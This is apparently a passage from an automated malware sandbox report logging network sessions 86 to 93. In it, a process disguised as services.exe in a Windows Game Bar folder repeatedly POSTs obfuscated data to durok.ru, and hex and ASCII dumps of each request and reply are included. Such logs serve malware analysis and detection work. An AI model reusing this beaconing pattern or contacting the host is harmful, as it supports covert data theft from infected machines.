                                                                                                                              Dec 26, 2024 17:18:41.001554012 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:41.253739119 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:41 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZkKi5lDjidx3%2BTjZH2IImemCF0imEXD5FQndOdyUtPlRcwngIMt%2B7Ih2oQRVmeFs50gstg0vcNDDZRSPPk%2Fz%2BkPCYarJYLf0Z8OEU03DM%2B6%2Fir908CrM6KAR7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82635d3fb04246-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2983&min_rtt=1584&rtt_var=3393&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=114214&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              86          192.168.2.4  49919        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:18:41.618165016 CET  307  OUT  POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:41.974330902 CET2548OUTData Raw: 59 5c 5e 5c 54 5c 59 5b 5e 58 52 54 56 5f 58 57 54 50 5b 5c 56 56 53 55 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y\^\T\Y[^XRTV_XWTP[\VVSUPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<!_+:6!T Z,.>4%' #Z T7:\8B?(_+%"Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:42.795603991 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:43.285592079 CET  794  IN  HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzMIxLhXlo81RmhCIskGmcH8ZDcFQUWevWUDSvUWVh2SxVHJCpizQ%2BpvQmSydRR08IirCFa6yTg6aANFV82667qATiRJOSogYyxZ1RLF0IBUEeC%2BzfwPCJhoEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263686c48433e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1676&rtt_var=4140&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=92857&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
                                                                                                                              Dec 26, 2024 17:18:43.435101986 CET  794  IN  HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:42 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HzMIxLhXlo81RmhCIskGmcH8ZDcFQUWevWUDSvUWVh2SxVHJCpizQ%2BpvQmSydRR08IirCFa6yTg6aANFV82667qATiRJOSogYyxZ1RLF0IBUEeC%2BzfwPCJhoEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263686c48433e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3431&min_rtt=1676&rtt_var=4140&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=92857&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              87          192.168.2.4  49920        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:18:42.195533037 CET  307  OUT  POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:42.552436113 CET2128OUTData Raw: 5c 5a 5e 5b 54 5d 59 56 5e 58 52 54 56 5a 58 53 54 50 5b 58 56 55 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: \Z^[T]YV^XRTVZXSTP[XVUS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$](W?<>",_.=%=40$, <V7?::'(V,^>5"Z.#Z**
                                                                                                                              Dec 26, 2024 17:18:43.374866962 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:43.625386000 CET  948  IN  HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:43 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XNbORkcgB62qTXFNazvbEIhoqCbASOxzGWQfD7320cxKEvstOFRDbWZexfYsyvewhmlnCU%2BEbIo3hyVjIf%2FY%2FYIK90%2B5lq9itMpztd4PFqXu9ZYRcqxIrdxPuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82636c0e36c332-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3285&min_rtt=1677&rtt_var=3846&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=100378&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 1e 2a 2a 3f 51 37 2c 06 1e 28 2d 21 0b 3e 57 25 14 2a 22 2e 05 28 01 03 0f 2a 28 3f 56 34 3a 31 05 2a 14 28 13 31 36 32 1f 32 0b 2e 5c 05 1d 27 5f 2b 2b 2c 10 27 22 35 1c 29 10 22 41 29 00 3d 15 33 01 23 5b 21 2b 07 07 20 0f 0a 13 2c 3c 33 06 2c 2f 20 5f 3c 1e 25 02 21 2d 21 51 0c 1f 38 55 36 07 23 5e 26 2d 3a 0d 36 33 3b 1f 31 16 32 53 21 2b 3f 57 27 29 38 05 27 33 28 0b 34 04 3b 53 28 13 07 07 32 59 35 12 3e 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$**?Q7,(-!>W%*".(*(?V4:1*(1622.\'_++,'"5)"A)=3#[!+ ,<3,/ _<%!-!Q8U6#^&-:63;12S!+?W')8'3(4;S(2Y5>9%^-#T>TV0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              88          192.168.2.4  49922        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:18:43.717396975 CET  307  OUT  POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:44.068008900 CET2548OUTData Raw: 59 5e 5e 51 54 5d 59 54 5e 58 52 54 56 51 58 57 54 53 5b 59 56 51 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y^^QT]YT^XRTVQXWTS[YVQS[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$[<+<)"#1?,>*7&07/ $4?.X.'<(X*"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:44.891454935 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:45.149710894 CET  803  IN  HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:44 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tvAPwPv%2F56yJ%2BhzGT6PYT0ISf4S22ubm6FmE5n3KKHTF6WvGbt%2FA88k%2BILvoAwRFYdg4luSH8U%2Fxqf%2BHuEbUOeaa0bNGnaU4O3FCCaT2vipM9nvFVSuqoDjLUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263758f708c18-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3470&min_rtt=1988&rtt_var=3710&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=105438&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              89          192.168.2.4  49927        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:18:44.845799923 CET  307  OUT  POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:45.193017960 CET2128OUTData Raw: 59 5d 5e 5c 54 5c 5c 56 5e 58 52 54 56 5d 58 57 54 54 5b 55 56 5e 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^\T\\V^XRTV]XWTT[UV^SYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+<Z(%T!/=%U=$0' #/$T#,_:?_)5"Z.#Z*6
                                                                                                                              Dec 26, 2024 17:18:46.024354935 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:46.286910057 CET  953  IN  HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:46 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M7szgAUV8kZY3%2F7%2BAhYSDBh2XPLQM4HVn%2BvmoZNj9T%2B9PeY6EkctpTeduhL5e7ReB9Aq1k85xCaI%2FpylHdesuukE0o77TX%2BPeIuBqoBhbyQvM4TxVDtC7L%2BfXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82637c9bb98c57-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4523&min_rtt=2030&rtt_var=5747&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=66439&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 27 04 29 29 20 0b 23 02 06 57 3c 13 22 14 2a 1f 04 05 2a 32 03 15 28 2f 03 0b 2a 38 34 0e 37 04 08 1e 3e 39 3f 00 26 08 0b 04 25 0b 2e 5c 05 1d 27 5b 28 05 24 58 26 32 0c 01 2a 2e 3a 41 3e 07 2a 02 27 3f 3f 5d 37 15 26 16 20 57 2b 00 2c 2f 28 59 39 2c 37 07 2a 20 22 1f 22 07 21 51 0c 1f 38 53 22 3a 3b 5a 31 10 0f 1d 22 20 37 12 31 01 31 0c 22 15 09 50 24 03 30 00 32 23 23 10 22 2d 01 1f 2b 13 25 03 31 01 3e 01 29 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98')) #W<"**2(/*847>9?&%.\'[($X&2*.:A>*'??]7& W+,/(Y9,7* ""!Q8S":;Z1" 711"P$02##"-+%1>))%^-#T>TV0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              90          192.168.2.4  49928        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:18:45.387126923 CET  307  OUT  POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:45.740107059 CET2548OUTData Raw: 59 58 5b 58 51 58 5c 57 5e 58 52 54 56 58 58 54 54 52 5b 5f 56 50 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[XQX\W^XRTVXXTTR[_VPSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$<13<**"T$Y,>.=4937,'#<.:#(;*5"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:46.565474987 CET  25  IN  HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:46.835933924 CET  796  IN  HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:46 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TdaTsYy7qNpRCnDpZSxPklIl1VL8qM%2F37y6s8DQ%2FYy5tSWM0kgV%2Fh6uUdfI0t5k5DRGanZ4HDOclvi4aIQ2Y%2FQTFjE%2BdJizRzYuuagDYCZoSiQtDa7RA8NdR7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82637ffb61334e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6981&min_rtt=1811&rtt_var=11020&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=33815&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a
                                                                                                                              Data Ascii: 4=Y]T
                                                                                                                              Dec 26, 2024 17:18:47.046119928 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                                                                              91          192.168.2.4  49934        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                                                              Dec 26, 2024 17:18:47.269145012 CET  307  OUT  POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:47.614980936 CET | 2128 | OUT | Data Raw: 59 5a 5b 5b 51 5e 5c 55 5e 58 52 54 56 5f 58 5b 54 5c 5b 54 56 53 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YZ[[Q^\U^XRTV_X[T\[TVSS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$+"3(5U"T;/6*7>Z$73\##<!,:<@<;="Z.#Z*>
                                                                                                                              Dec 26, 2024 17:18:48.452908993 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:48.705521107 CET | 943 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yLj2MsyRCOYs8n0AFXaDentXHHkYEhWyejoTZQUjV5G0M5vNDnajDqpwXq7%2FQaI3RUZHIvdjPLNu3t6M2xpXNzeGygDjaxtiPU9LtTWROH7oFzuQchUY7%2FOp1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82638bcbec18d0-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3281&min_rtt=1656&rtt_var=3872&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=99570&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 59 3e 07 27 1a 23 3c 24 1d 3f 2d 0c 56 28 22 22 07 3f 21 31 17 2b 11 0c 10 2b 01 20 0f 21 2a 2d 01 29 29 33 00 26 35 31 00 31 0b 2e 5c 05 1d 27 5e 3f 38 3b 03 30 32 25 58 3e 00 00 0a 29 3d 39 15 30 3c 2b 11 34 02 22 5d 23 31 3c 1e 2f 2c 02 12 2e 5a 37 06 28 09 39 05 22 17 21 51 0c 1f 38 55 36 29 0e 06 27 2d 29 54 35 0e 27 57 26 16 0f 0b 35 02 3f 13 33 04 2f 5a 25 33 06 0c 34 03 0d 1f 3c 03 0f 06 26 01 36 02 29 39 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$Y>'#<$?-V(""?!1++ !*-))3&511.\'^?8;02%X>)=90<+4"]#1</,.Z7(9"!Q8U6)'-)T5'W&5?3/Z%34<&6)9%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              92 | 192.168.2.4 | 49935 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:47.299079895 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:47.646269083 CET | 2548 | OUT | Data Raw: 59 58 5b 5f 51 5c 59 51 5e 58 52 54 56 58 58 57 54 57 5b 59 56 55 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[_Q\YQ^XRTVXXWTW[YVUSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<?(%U"/,.9T?72'4<< 2Y-: A?V8\)"Z.#Z*"
                                                                                                                              Dec 26, 2024 17:18:48.516638994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:48.773500919 CET | 795 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:48 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5lSLA7061F9DUiFsT8zz7TCfkcehvIIpbDNmajQijajX%2FpEH0c6aYkuFSq9nnBz2KJFlddP2fNJjW0YIBLA8%2FeS6er9WdHtqlfKNIAfblmAbOp37TrMFw7on6g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82638c1ba5de92-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9355&min_rtt=1609&rtt_var=16096&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=22962&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              93 | 192.168.2.4 | 49940 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:49.014398098 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2536
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:49.364878893 CET | 2536 | OUT | Data Raw: 59 59 5b 5c 54 59 5c 51 5e 58 52 54 56 59 58 53 54 5d 5b 5b 56 50 53 54 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
